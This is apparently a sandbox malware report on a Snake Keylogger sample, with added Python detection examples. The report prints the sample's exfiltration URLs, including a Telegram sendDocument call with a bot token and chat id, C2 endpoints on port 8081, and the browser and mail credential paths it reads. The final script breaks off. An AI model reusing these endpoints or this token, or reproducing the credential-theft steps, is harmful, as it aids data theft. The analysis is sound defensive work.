Source: ectosphere.exe | Binary or memory string: WIN_81
Source: ectosphere.exe | Binary or memory string: WIN_XP
Source: ectosphere.exe | Binary or memory string: WIN_XPe
Source: ectosphere.exe | Binary or memory string: WIN_VISTA
Source: ectosphere.exe | Binary or memory string: WIN_7
Source: ectosphere.exe | Binary or memory string: WIN_8
Source: ectosphere.exe.0.dr | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: Yara match | File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.ectosphere.exe.39f0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.ectosphere.exe.31e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.ectosphere.exe.31e0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.ectosphere.exe.39f0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.4526688861.000000000043A000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2132554005.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2294799586.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4529175077.0000000002D6B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: ectosphere.exe PID: 2848, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 2804, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: ectosphere.exe PID: 2920, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 6148, type: MEMORYSTR
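The two behaviours this section documents form a reliable detection pair: RegSvcs.exe is created by the AutoIt-compiled dropper with the dropper's own path as its command line (the hollowed-host pattern from the process-creation entry above), and that same RegSvcs.exe instance then opens the Chrome and Edge credential stores, the Postbox profile directory and the Outlook MAPI profile key. The Python below is an added example written for this page, not part of the Joe Sandbox report or of any vendor rule set. It runs that logic over constructed process-creation and file/registry-access events modelled on the paths shown above; the event schema, the DOTNET_HOSTS entries beyond RegSvcs.exe, and the severity thresholds are assumptions.

```python
import re
from collections import defaultdict

# .NET utility binaries commonly used as hollowing targets. The report only shows
# RegSvcs.exe; the other names are an assumption added for coverage.
DOTNET_HOSTS = {"regsvcs.exe", "regasm.exe", "installutil.exe", "msbuild.exe"}

# Browser / mail stores RegSvcs.exe opened in the report.
CRED_STORE = re.compile(
    r"\\User Data\\[^\\]+\\(?:Login Data|Web Data|History|Top Sites)$"
    r"|\\User Data\\[^\\]+\\Network\\Cookies$"
    r"|\\PostboxApp\\Profiles\\$",
    re.IGNORECASE,
)
# Outlook MAPI profile key opened in the report (registry path).
MAPI_PROFILE_KEY = re.compile(r"\\Windows Messaging Subsystem\\Profiles\\", re.IGNORECASE)


def _base(path):
    """Lower-cased final path component, tolerant of trailing backslashes."""
    return path.replace("/", "\\").rstrip("\\").rsplit("\\", 1)[-1].lower()


def _argv0(cmdline):
    """First token of a Windows command line, honouring a quoted program path."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        return cmdline.split('"')[1]
    return cmdline.split(" ", 1)[0]


def process_findings(ev):
    """Indicators from one process-creation event (Image, CommandLine, ParentImage)."""
    out = []
    image = _base(ev["Image"])
    if image not in DOTNET_HOSTS:
        return out
    # Hollowed host: the command line names the loader, not the host binary itself.
    if _base(_argv0(ev["CommandLine"])) != image:
        out.append("dotnet_host_cmdline_mismatch")
    parent = ev["ParentImage"].lower()
    if "\\appdata\\" in parent or "\\temp\\" in parent:
        out.append("dotnet_host_parent_in_user_writable_path")
    return out


def access_findings(ev):
    """Indicators from one file/registry open event (Image, Target)."""
    if _base(ev["Image"]) not in DOTNET_HOSTS:
        return []
    if CRED_STORE.search(ev["Target"]):
        return ["browser_or_mail_store_read"]
    if MAPI_PROFILE_KEY.search(ev["Target"]):
        return ["outlook_profile_key_read"]
    return []


def score(events):
    """Per-PID verdict: a hollowing indicator plus two or more store reads -> 'high'."""
    per_pid = defaultdict(list)
    for ev in events:
        fn = process_findings if ev["EventType"] == "ProcessCreate" else access_findings
        per_pid[ev["ProcessId"]].extend(fn(ev))
    verdicts = {}
    for pid, f in per_pid.items():
        injected = any(x.startswith("dotnet_host_") for x in f)
        reads = sum(x.endswith("_read") for x in f)
        verdicts[pid] = "high" if injected and reads >= 2 else ("medium" if injected or reads else "none")
    return verdicts


REGSVCS = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
DROPPER = r"C:\Users\user\AppData\Local\Allene\ectosphere.exe"

# Constructed events modelled on the report; not a real log export.
SAMPLE_EVENTS = [
    {"EventType": "ProcessCreate", "ProcessId": 2804, "Image": REGSVCS,
     "CommandLine": '"' + DROPPER + '"', "ParentImage": DROPPER},
    {"EventType": "FileOpen", "ProcessId": 2804, "Image": REGSVCS,
     "Target": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"EventType": "FileOpen", "ProcessId": 2804, "Image": REGSVCS,
     "Target": r"C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies"},
    {"EventType": "RegistryOpen", "ProcessId": 2804, "Image": REGSVCS,
     "Target": r"HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676"},
    # Benign: a developer registering a COM+ assembly with RegSvcs from Visual Studio (constructed).
    {"EventType": "ProcessCreate", "ProcessId": 4100, "Image": REGSVCS,
     "CommandLine": '"' + REGSVCS + '" MyComponent.dll',
     "ParentImage": r"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.exe"},
    # Benign: Chrome reads its own Login Data; not a .NET host, so it is ignored.
    {"EventType": "FileOpen", "ProcessId": 5120,
     "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "Target": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
]

if __name__ == "__main__":
    for pid, verdict in score(SAMPLE_EVENTS).items():
        print(pid, verdict)
```

Sysmon logs process creation but not file reads, so the FileOpen and RegistryOpen records stand in for an EDR file/registry telemetry feed. The command-line mismatch alone is worth a medium alert: a legitimate RegSvcs.exe invocation names RegSvcs.exe (or an assembly argument) on its command line, never the path of an unsigned binary under AppData.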

                Remote Access Functionality

Source: Yara match | File source: 00000003.00000002.4529175077.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.4529357872.00000000032F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.ectosphere.exe.39f0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.ectosphere.exe.31e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.ectosphere.exe.31e0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.ectosphere.exe.39f0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.4529357872.000000000346F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4529175077.0000000002D9D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2132554005.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2294799586.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: ectosphere.exe PID: 2848, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 2804, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: ectosphere.exe PID: 2920, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 6148, type: MEMORYSTR
Source: Yara match | File source: 6.2.ectosphere.exe.39f0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.ectosphere.exe.31e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.ectosphere.exe.31e0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.ectosphere.exe.39f0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.4526700849.0000000000435000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2132554005.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2294799586.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: ectosphere.exe PID: 2848, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: ectosphere.exe PID: 2920, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 6148, type: MEMORYSTR
Source: C:\Users\user\Desktop\6BRa130JDj.exe | Code function: 0_2_00326283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket
Source: C:\Users\user\Desktop\6BRa130JDj.exe | Code function: 0_2_00326747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket
Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe | Code function: 2_2_00096283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket
Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe | Code function: 2_2_00096747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket
MITRE ATT&CK Matrix (flattened by extraction). Tactic columns: Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact.

Techniques with matching signatures, with the number of matching signatures as shown in the report (the matrix's unmatched template entries are omitted):

Initial Access: Valid Accounts (2)
Execution: Scripting (111), Native API (2)
Persistence: Valid Accounts (2), DLL Side-Loading (1), Registry Run Keys / Startup Folder (2)
Privilege Escalation: Exploitation for Privilege Escalation (1), DLL Side-Loading (1), Valid Accounts (2), Access Token Manipulation (21), Process Injection (212), Registry Run Keys / Startup Folder (2)
Defense Evasion: Scripting (111), Disable or Modify Tools (11), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (3), DLL Side-Loading (1), Masquerading (1), Valid Accounts (2), Virtualization/Sandbox Evasion (11), Access Token Manipulation (21), Process Injection (212)
Credential Access: OS Credential Dumping (1), Input Capture (21)
Discovery: System Time Discovery (2), Account Discovery (1), File and Directory Discovery (2), System Information Discovery (127), Security Software Discovery (231), Virtualization/Sandbox Evasion (11), Process Discovery (2), Application Window Discovery (11), System Owner/User Discovery (1), System Network Configuration Discovery (1)
Collection: Archive Collected Data (1), Data from Local System (1), Email Collection (1), Input Capture (21), Clipboard Data (3)
Command and Control: Web Service (1), Ingress Tool Transfer (4), Encrypted Channel (11), Non-Application Layer Protocol (4), Application Layer Protocol (15)
Impact: System Shutdown/Reboot (1)
Behavior Graph ID: 1588367 | Sample: 6BRa130JDj.exe | Start date: 11/01/2025 | Architecture: WINDOWS | Score: 100

Contacted hosts: reallyfreegeoip.org, api.telegram.org, 2 other IPs or domains
Graph-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 10 other signatures
reallyfreegeoip.org: Tries to detect the country of the analysis system (by using the IP)
api.telegram.org: Uses the Telegram API (likely for C&C communication)

Process tree:
6BRa130JDj.exe (started)
    dropped: C:\Users\user\AppData\...\ectosphere.exe, PE32
    signatures: Binary is likely a compiled AutoIt script file
    -> ectosphere.exe (started)
        dropped: C:\Users\user\AppData\...\ectosphere.vbs, data
        signatures: Multi AV Scanner detection for dropped file; Binary is likely a compiled AutoIt script file; Machine Learning detection for dropped file; 2 other signatures
        -> RegSvcs.exe (started)
            api.telegram.org 149.154.167.220, 443, 49749, 55432, TELEGRAMRU, United Kingdom
            checkip.dyndns.com 193.122.6.168, 49704, 49707, 49709, ORACLE-BMC-31898US, United States
            reallyfreegeoip.org 104.21.80.1, 443, 49705, 49706, CLOUDFLARENETUS, United States
wscript.exe (started)
    signatures: Windows Scripting host queries suspicious COM object (likely to drop second stage)
    -> ectosphere.exe (started)
        signatures: Writes to foreign memory regions; Maps a DLL or memory area into another process
        -> RegSvcs.exe (started)
            signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc)

Antivirus and machine-learning detection (Source | Detection | Scanner | Label):
6BRa130JDj.exe | 75% | ReversingLabs | Win32.Spyware.Snakekeylogger
6BRa130JDj.exe | 100% | Joe Sandbox ML
C:\Users\user\AppData\Local\Allene\ectosphere.exe | 100% | Joe Sandbox ML
C:\Users\user\AppData\Local\Allene\ectosphere.exe | 75% | ReversingLabs | Win32.Spyware.Snakekeylogger
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
Domains (Name | IP | Active | Malicious | Antivirus Detection | Reputation):
reallyfreegeoip.org | 104.21.80.1 | true | false | none | high
api.telegram.org | 149.154.167.220 | true | false | none | high
checkip.dyndns.com | 193.122.6.168 | true | false | none | high
checkip.dyndns.org | unknown | unknown | false | none | high
Contacted URLs (Name | Malicious | Antivirus Detection | Reputation):
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:376483%0D%0ADate%20and%20Time:%2011/01/2025%20/%2007:42:48%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20376483%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | none | high
https://reallyfreegeoip.org/xml/8.46.123.189 | false | none | high
http://checkip.dyndns.org/ | false | none | high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:376483%0D%0ADate%20and%20Time:%2011/01/2025%20/%2007:32:35%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20376483%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | none | high
https://api.telegram.org/bot7489657060:AAEq5tTUQiWuuifDLGy6qn_cJN5txd73Csg/sendDocument?chat_id=1886630858&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery | false | none | high
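The URL lists in this report show the two forms the sample's Telegram traffic takes: a format-string template with an empty bot token and empty chat_id (bot/sendMessage?chat_id=&text=...), and a fully populated sendDocument call that carries the bot token and the chat id, alongside plain-HTTP host:port endpoints on port 8081 and the checkip.dyndns.org / reallyfreegeoip.org lookups used to geolocate the victim. The Python below is an added example, not part of the Joe Sandbox report and not the malware's own code, that pulls those into a structured indicator set from raw memory strings; the SAMPLE_STRINGS are constructed from the values shown on this page, and the token shape check (numeric bot id, colon, at least 30 URL-safe characters) is an assumption.

```python
import re
from urllib.parse import parse_qs

TG_URL = re.compile(
    r"https?://api\.telegram\.org/bot(?P<token>[^/\s\"']*)/(?P<method>[A-Za-z]+)\?(?P<qs>[^\s\"']*)"
)
# Bot token shape: numeric bot id, colon, secret (assumption: at least 30 URL-safe characters).
TOKEN_SHAPE = re.compile(r"^(?P<bot_id>\d{6,12}):(?P<secret>[A-Za-z0-9_-]{30,})$")
# Plain-HTTP endpoints with an explicit port, like the :8081 hosts in the report.
HTTP_HOST_PORT = re.compile(r"https?://(?P<hostport>[A-Za-z0-9.-]+:\d{2,5})(?=[/\s\"']|$)")
IP_LOOKUP_HOSTS = ("checkip.dyndns.org", "checkip.dyndns.com", "reallyfreegeoip.org")


def mask_token(token):
    """Keep the live token out of tickets and logs: first and last four characters only."""
    return token[:4] + "..." + token[-4:]


def extract_c2(strings):
    """Return Telegram bot/chat pairs, template count, host:port endpoints and IP-lookup hosts."""
    found = {"telegram": [], "templates": 0, "http_hosts": set(), "ip_lookup": set()}
    seen = set()
    for s in strings:
        for m in TG_URL.finditer(s):
            token = m.group("token")
            chat_id = parse_qs(m.group("qs"), keep_blank_values=True).get("chat_id", [""])[0]
            if not token or not chat_id:
                found["templates"] += 1       # format-string template, not a live indicator
                continue
            key = (token, chat_id, m.group("method"))
            if key in seen:
                continue
            seen.add(key)
            shape = TOKEN_SHAPE.match(token)
            found["telegram"].append({
                "bot_id": shape.group("bot_id") if shape else None,
                "token_masked": mask_token(token),
                "token_wellformed": shape is not None,
                "chat_id": chat_id,
                "method": m.group("method"),
            })
        for m in HTTP_HOST_PORT.finditer(s):
            found["http_hosts"].add(m.group("hostport"))
        for host in IP_LOOKUP_HOSTS:
            if host in s:
                found["ip_lookup"].add(host)
    return found


# Constructed input: strings copied from the URL tables of this report, in the form a
# strings-style dump of the RegSvcs.exe memory regions would yield.
SAMPLE_STRINGS = [
    "https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:376483%0D%0ADate%20and%20Time:%2011/01/2025%20/%2007:42:48",
    "https://api.telegram.org/bot/sendMessage?chat_id=&text=",
    "https://api.telegram.org/bot7489657060:AAEq5tTUQiWuuifDLGy6qn_cJN5txd73Csg/sendDocument?chat_id=1886630858&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery",
    "https://api.telegram.org/bot",
    "http://checkip.dyndns.org/",
    "https://reallyfreegeoip.org/xml/",
    "http://varders.kozow.com:8081",
    "http://aborters.duckdns.org:8081",
    "http://anotherarmy.dns.army:8081",
    "http://51.38.247.67:8081/_send_.php?L",
]

if __name__ == "__main__":
    result = extract_c2(SAMPLE_STRINGS)
    for entry in result["telegram"]:
        print("telegram bot", entry["bot_id"], "chat", entry["chat_id"], "via", entry["method"])
    print("templates:", result["templates"])
    print("http hosts:", sorted(result["http_hosts"]))
    print("ip lookup:", sorted(result["ip_lookup"]))
```

Treating the empty-token URLs as templates rather than indicators matters: the sample embeds the sendMessage format string unfilled, and only the sendDocument string carries the live bot id and chat id. The bot id and chat id are the values worth sharing; the full token is what an abuse report to Telegram needs, so the function keeps it masked in the returned record.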
URLs found in memory (Name | Source | Malicious | Reputation):
https://www.office.com/ | RegSvcs.exe, 00000007.00000002.4529357872.00000000034E4000.00000004.00000800.00020000.00000000.sdmp | false | high
https://duckduckgo.com/chrome_newtab | RegSvcs.exe, 00000003.00000002.4532596106.0000000003C81000.00000004.00000800.00020000.00000000.sdmp | false | high
https://duckduckgo.com/ac/?q= | RegSvcs.exe, 00000003.00000002.4532596106.0000000003C81000.00000004.00000800.00020000.00000000.sdmp | false | high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:376483%0D%0ADate%20a | RegSvcs.exe, 00000003.00000002.4529175077.0000000002D46000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.00000000033D6000.00000004.00000800.00020000.00000000.sdmp | false | high
https://api.telegram.org | RegSvcs.exe, 00000003.00000002.4529175077.0000000002D46000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4529175077.0000000002D9D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.000000000346F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.00000000033D6000.00000004.00000800.00020000.00000000.sdmp | false | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | RegSvcs.exe, 00000003.00000002.4532596106.0000000003C81000.00000004.00000800.00020000.00000000.sdmp | false | high
https://api.telegram.org/bot | RegSvcs.exe, 00000007.00000002.4529357872.000000000346F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.00000000033D6000.00000004.00000800.00020000.00000000.sdmp | false | high
https://api.telegram.org/bot7489657060:AAEq5tTUQiWuuifDLGy6qn_cJN5txd73Csg/sendDocument?chat_id=1886 | RegSvcs.exe, 00000007.00000002.4529357872.000000000346F000.00000004.00000800.00020000.00000000.sdmp | false | high
https://www.office.com/lB | RegSvcs.exe, 00000003.00000002.4529175077.0000000002E4E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.00000000034DF000.00000004.00000800.00020000.00000000.sdmp | false | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | RegSvcs.exe, 00000003.00000002.4532596106.0000000003C81000.00000004.00000800.00020000.00000000.sdmp | false | high
http://checkip.dyndns.org | RegSvcs.exe, 00000003.00000002.4529175077.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.00000000032F1000.00000004.00000800.00020000.00000000.sdmp | false | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | RegSvcs.exe, 00000003.00000002.4532596106.0000000003C81000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4532685097.0000000004313000.00000004.00000800.00020000.00000000.sdmp | false | high
https://api.telegram.org/bot/sendMessage?chat_id=&text= | RegSvcs.exe, 00000003.00000002.4529175077.0000000002D46000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.00000000033D6000.00000004.00000800.00020000.00000000.sdmp | false | high
https://chrome.google.com/webstore?hl=en | RegSvcs.exe, 00000007.00000002.4529357872.00000000034B3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.00000000034E4000.00000004.00000800.00020000.00000000.sdmp | false | high
https://www.ecosia.org/newtab/ | RegSvcs.exe, 00000003.00000002.4532596106.0000000003C81000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4532685097.0000000004313000.00000004.00000800.00020000.00000000.sdmp | false | high
http://varders.kozow.com:8081 | ectosphere.exe, 00000002.00000002.2132554005.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4529175077.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4526688861.0000000000434000.00000040.80000000.00040000.00000000.sdmp, ectosphere.exe, 00000006.00000002.2294799586.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.00000000032F1000.00000004.00000800.00020000.00000000.sdmp | false | high
http://aborters.duckdns.org:8081 | ectosphere.exe, 00000002.00000002.2132554005.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4529175077.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4526688861.0000000000434000.00000040.80000000.00040000.00000000.sdmp, ectosphere.exe, 00000006.00000002.2294799586.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.00000000032F1000.00000004.00000800.00020000.00000000.sdmp | false | high
https://ac.ecosia.org/autocomplete?q= | RegSvcs.exe, 00000003.00000002.4532596106.0000000003C81000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4532685097.0000000004313000.00000004.00000800.00020000.00000000.sdmp | false | high
http://51.38.247.67:8081/_send_.php?L | RegSvcs.exe, 00000003.00000002.4529175077.0000000002D9D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.000000000346F000.00000004.00000800.00020000.00000000.sdmp | false | high
http://anotherarmy.dns.army:8081 | ectosphere.exe, 00000002.00000002.2132554005.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4529175077.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4526688861.0000000000434000.00000040.80000000.00040000.00000000.sdmp, ectosphere.exe, 00000006.00000002.2294799586.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.00000000032F1000.00000004.00000800.00020000.00000000.sdmp | false | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | RegSvcs.exe, 00000003.00000002.4532596106.0000000003C81000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4532685097.0000000004313000.00000004.00000800.00020000.00000000.sdmp | false | high
http://checkip.dyndns.org/q | ectosphere.exe, 00000002.00000002.2132554005.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, ectosphere.exe, 00000006.00000002.2294799586.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4526700849.0000000000435000.00000040.80000000.00040000.00000000.sdmp | false
                                                                              high
                                                                              https://chrome.google.com/webstore?hl=enlBRegSvcs.exe, 00000003.00000002.4529175077.0000000002E1D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.00000000034AE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://reallyfreegeoip.org/xml/8.46.123.189$RegSvcs.exe, 00000003.00000002.4529175077.0000000002D1E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4529175077.0000000002D46000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4529175077.0000000002CD9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.00000000033AE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.00000000033D6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.0000000003369000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://reallyfreegeoip.orgRegSvcs.exe, 00000003.00000002.4529175077.0000000002D1E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4529175077.0000000002CAF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4529175077.0000000002D46000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.00000000033AE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.00000000033D6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.000000000333F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://api.telegram.orgRegSvcs.exe, 00000003.00000002.4529175077.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4529175077.0000000002D9D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.000000000346F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.0000000003496000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 00000003.00000002.4529175077.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.00000000032F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=RegSvcs.exe, 00000003.00000002.4532596106.0000000003C81000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4532685097.0000000004313000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedectosphere.exe, 00000002.00000002.2132554005.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, ectosphere.exe, 00000006.00000002.2294799586.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4526700849.0000000000435000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://reallyfreegeoip.org/xml/ectosphere.exe, 00000002.00000002.2132554005.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4529175077.0000000002CAF000.00000004.00000800.00020000.00000000.sdmp, ectosphere.exe, 00000006.00000002.2294799586.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.000000000333F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4526700849.0000000000435000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                              high
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
193.122.6.168 | checkip.dyndns.com | United States | 31898 | ORACLE-BMC-31898US | false
104.21.80.1 | reallyfreegeoip.org | United States | 13335 | CLOUDFLARENETUS | false
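The hosts, IPs and URL path from the tables above, matched against proxy log lines. This is an added example and not part of the Joe Sandbox report: the indicator strings are copied from the tables, while the log format, the role labels (recon / exfil / dyn-dns) and the sample log lines are constructed for the example. The correlation step reflects the behaviour the report flags (public-IP and country lookup, then upload via the Telegram API or the HTTP form endpoint) rather than alerting on any single lookup, since checkip.dyndns.org, reallyfreegeoip.org and api.telegram.org are also used legitimately.

```python
"""Match the network indicators from this report against proxy log lines.

Added example, not part of the Joe Sandbox report. The indicator strings are
copied from the URL and IP tables above; the log format, the role labels and
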